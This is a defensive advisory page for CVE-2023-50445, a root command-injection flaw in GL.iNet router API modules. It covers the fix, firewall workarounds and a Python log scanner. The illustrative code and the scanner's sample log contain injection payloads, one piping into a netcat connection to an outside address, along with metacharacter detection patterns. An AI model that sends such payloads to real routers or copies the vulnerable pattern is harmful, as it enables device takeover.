CVE-2023-50445
📋 TL;DR
This CVE describes a shell metacharacter injection vulnerability in multiple GL.iNet router models: specific functions of the logread and upgrade API modules pass caller-supplied strings into shell commands without sanitisation, so anyone who can reach the router's web API can execute arbitrary commands with the privileges of the API backend, which on these OpenWrt-based devices is root. All users running affected firmware versions on the listed models are vulnerable; the vendor advisory gives the exact affected and fixed version per model.
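To make the bug class concrete, here is an added illustration (not GL.iNet's code and not from the page): a model API handler that shells out with a caller-controlled string, the way the vulnerable logread/upgrade functions are described as doing, beside two hardened forms. The function name (get_log), the argument names (path, name) and the log table are hypothetical.

```python
"""Added illustration of the bug class behind CVE-2023-50445; this is NOT
GL.iNet's code.  The API function name (get_log), the argument names
(path, name) and the log table are hypothetical.  It models an API handler
that shells out with a caller-controlled string, then shows two fixes."""
import re

# Hypothetical allow-list: API callers pick a log by name, never by path.
ALLOWED_LOGS = {"system": "/var/log/messages", "kernel": "/tmp/dmesg.log"}

# Strict path shape for the case where a free-form path must be accepted.
SAFE_PATH = re.compile(r"/(?:[A-Za-z0-9._-]+/)*[A-Za-z0-9._-]+")


def vulnerable_command(args):
    """VULNERABLE: the JSON argument is interpolated into a shell string.
    Returns the string that would be handed to /bin/sh -c so the injection
    is visible without executing anything."""
    path = args.get("path", "")
    return f"tail -n 50 {path}"   # "/tmp/x; id" -> tail runs, then id runs


def hardened_argv(args):
    """HARDENED: map caller input through an allow-list and build argv for
    subprocess.run(argv) (no shell), so metacharacters are never parsed."""
    name = args.get("name", "")
    if name not in ALLOWED_LOGS:
        raise ValueError(f"unknown log {name!r}")
    return ["tail", "-n", "50", ALLOWED_LOGS[name]]


def hardened_path_argv(args):
    """HARDENED variant when a path must be accepted: validate its shape,
    forbid traversal, and still use argv rather than a shell string."""
    path = args.get("path", "")
    if not SAFE_PATH.fullmatch(path) or ".." in path.split("/"):
        raise ValueError(f"rejected path {path!r}")
    return ["tail", "-n", "50", path]


if __name__ == "__main__":
    print(vulnerable_command({"path": "/tmp/x; id"}))
    print(hardened_argv({"name": "system"}))
    print(hardened_path_argv({"path": "/var/log/messages"}))
```

The allow-list form is preferable: quoting the input (shlex.quote) would stop the metacharacters but still let the caller read any file the backend can, which on a root-running API is everything.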
💻 Affected Systems
- GL.iNet A1300
- AX1800
- AXT1800
- MT3000
- MT2500
- MT6000
- MT1300
- MT300N-V2
- AR750S
- AR750
- AR300M
- B1300
📦 What is this software?
GL.iNet manufactures OpenWrt-based travel, home and IoT routers. Firmware 4.x ships a web administration interface backed by a JSON-RPC API (POST /rpc) that dispatches calls to server-side modules; logread (log viewing) and upgrade (firmware upgrade) are two of those modules, and the vulnerable functions live in them.
⚠️ Risk & Real-World Impact
Worst Case
Complete device compromise allowing attackers to install persistent backdoors, intercept network traffic, pivot to internal networks, and use the device for further attacks.
Likely Case
Remote command execution as root by anyone who can reach the web API (the LAN by default, or the WAN if remote administration is enabled), leading to unauthorized access to router configuration, network monitoring, and potential credential theft.
If Mitigated
Limited impact if network segmentation and access controls keep untrusted hosts from reaching the router's web API at all.
🎯 Exploit Status
Public exploit code exists; the Packet Storm reference below presents it as unauthenticated remote command execution. The vulnerability is triggered by crafted JSON-RPC requests to the API, so exploitation is straightforward for anyone who can reach the management interface.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor advisory for specific patched versions per model
Vendor Advisory: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md
Restart Required: Yes
Instructions:
1. Log into the router admin interface.
2. Navigate to System > Firmware Upgrade.
3. Check for available updates.
4. Download and install the latest firmware (the fixed version for your model is listed in the vendor advisory).
5. Reboot the router after installation.
🔧 Temporary Workarounds
Disable vulnerable API endpoints
Block access to the logread and upgrade module API functions via firewall rules on the router. These string-match rules are a crude stopgap: they are case-sensitive, inspect plaintext HTTP only (not HTTPS on 443), match per packet (a request split across TCP segments evades them), and also break legitimate log viewing and firmware upgrades from the admin UI. Insert them at the top of INPUT with -I; on OpenWrt the LAN zone accepts traffic earlier in the chain, so rules appended with -A are never reached. They do not persist across a reboot unless added to /etc/firewall.user (fw3-based builds) or an equivalent firewall include.
iptables -I INPUT 1 -p tcp --dport 80 -m string --string "logread" --algo bm -j DROP
iptables -I INPUT 1 -p tcp --dport 80 -m string --string "upgrade" --algo bm -j DROP
Restrict web interface access
Limit access to the router web interface to a trusted management host. Replace 192.168.8.10 with your admin machine; note that the GL.iNet default LAN is 192.168.8.0/24 (not 192.168.1.0/24), and that allowing the whole LAN subnet would still let any LAN host reach the vulnerable API. Insert the DROP first so the ACCEPT inserted afterwards lands above it.
iptables -I INPUT 1 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT 1 -p tcp -m multiport --dports 80,443 -s 192.168.8.10 -j ACCEPT
🧯 If You Can't Patch
- Isolate affected routers in separate VLAN with strict access controls
- Implement network monitoring for suspicious JSON-RPC calls into the logread and upgrade modules
🔍 How to Verify
Check if Vulnerable:
Check the firmware version via the web interface: System > Status > Firmware Version. Compare it against the affected versions listed per model in the vendor advisory.
Check Version:
cat /etc/glversion (over SSH), or check the web interface at System > Status
Verify Fix Applied:
After updating, confirm the firmware version matches or exceeds the fixed version the vendor advisory lists for your model, then confirm that the firewall workarounds above (if applied) have been removed so legitimate log viewing and upgrades work again.
📡 Detection & Monitoring
Log Indicators:
- Unusual API requests to the JSON-RPC endpoint (POST /rpc on 4.x firmware; /cgi-bin/api/ on 3.x) targeting the logread or upgrade modules with shell metacharacters in their arguments
- Suspicious commands in system logs originating from web interface
Network Indicators:
- HTTP POST requests to router IP containing shell metacharacters in parameters
- Unusual outbound connections from router after API calls
SIEM Query:
source="router_logs" AND ("logread" OR "upgrade") AND ("|" OR ";" OR "$" OR "`" OR "&&")
This raw-string query is noisy (a bare $ or | appears in legitimate traffic); where your pipeline parses the JSON-RPC body, match on the module field and scan only that call's arguments instead.
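The structured version of that check, as an added example that is not from the page or from GL.iNet: it parses each logged request body as a GL.iNet 4.x style JSON-RPC call (method "call", params [sid, module, function, args]), keeps only calls into logread or upgrade, and flags those whose arguments contain shell metacharacters. The log line format (one JSON object per request with ts/src/uri/body), the function names (get_log, start, get_status, set_hostname) and every request in the sample are constructed for this example.

```python
"""Added detection example (not from the page or GL.iNet): flag JSON-RPC calls
into the logread/upgrade modules whose arguments carry shell metacharacters.
Assumes the GL.iNet 4.x call layout, POST /rpc with
{"method": "call", "params": [sid, module, function, args]}.  The log line
format (ts/src/uri/body), the function names and every request below are
constructed for this example."""
import json
import re

WATCHED_MODULES = {"logread", "upgrade"}
# Characters that break out of, or substitute into, a shell command line.
METACHARS = re.compile(r"[;|&`$()<>\n]")


def _rec(ts, src, uri, body_obj):
    """Build one constructed log line; body holds the raw request body."""
    body = "" if body_obj is None else json.dumps(body_obj)
    return json.dumps({"ts": ts, "src": src, "uri": uri, "body": body})


def _call(module, func, args=None):
    """Constructed 4.x style JSON-RPC call with a dummy session id."""
    return {"jsonrpc": "2.0", "id": 1, "method": "call",
            "params": ["c0ffee", module, func, args or {}]}


SAMPLE_LOG = "\n".join([
    _rec("2024-01-05T10:00:01Z", "192.168.8.100", "/index.html", None),
    _rec("2024-01-05T10:00:02Z", "192.168.8.100", "/rpc", _call("system", "get_status")),
    # legitimate log view: watched module, clean argument
    _rec("2024-01-05T10:00:03Z", "192.168.8.100", "/rpc",
         _call("logread", "get_log", {"lines": "50"})),
    # injection attempt against logread
    _rec("2024-01-05T10:00:04Z", "192.168.8.200", "/rpc",
         _call("logread", "get_log", {"path": "/tmp/x; id"})),
    # metacharacter in an unwatched module: not flagged (a raw-string query would fire)
    _rec("2024-01-05T10:00:05Z", "192.168.8.100", "/rpc",
         _call("system", "set_hostname", {"name": "lab$1"})),
    # injection attempt against upgrade
    _rec("2024-01-05T10:00:06Z", "192.168.8.200", "/rpc",
         _call("upgrade", "start", {"path": "/tmp/fw.img|nc 10.0.0.1 4444"})),
])


def iter_strings(obj):
    """Yield every string nested anywhere inside a JSON value."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from iter_strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from iter_strings(v)


def parse_rpc(body):
    """Return (module, function, args) for a 4.x style call, else None."""
    try:
        req = json.loads(body)
    except ValueError:
        return None
    if not isinstance(req, dict) or req.get("method") != "call":
        return None
    params = req.get("params")
    if not isinstance(params, list) or len(params) < 3:
        return None
    args = params[3] if len(params) > 3 else {}
    return params[1], params[2], args


def scan(log_text):
    """Return one finding per watched-module call carrying a metacharacter."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec.get("uri") != "/rpc":
            continue
        parsed = parse_rpc(rec.get("body", ""))
        if parsed is None:
            continue
        module, func, args = parsed
        if module not in WATCHED_MODULES:
            continue
        hits = [s for s in iter_strings(args) if METACHARS.search(s)]
        if hits:
            findings.append({"ts": rec["ts"], "src": rec["src"],
                             "module": module, "function": func, "args": hits})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Run against the sample it reports the two injection attempts from 192.168.8.200 and stays quiet on the set_hostname call that carries a $, which the raw-string SIEM query would have flagged.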
🔗 References
- http://packetstormsecurity.com/files/176708/GL.iNet-Unauthenticated-Remote-Command-Execution.html
- https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md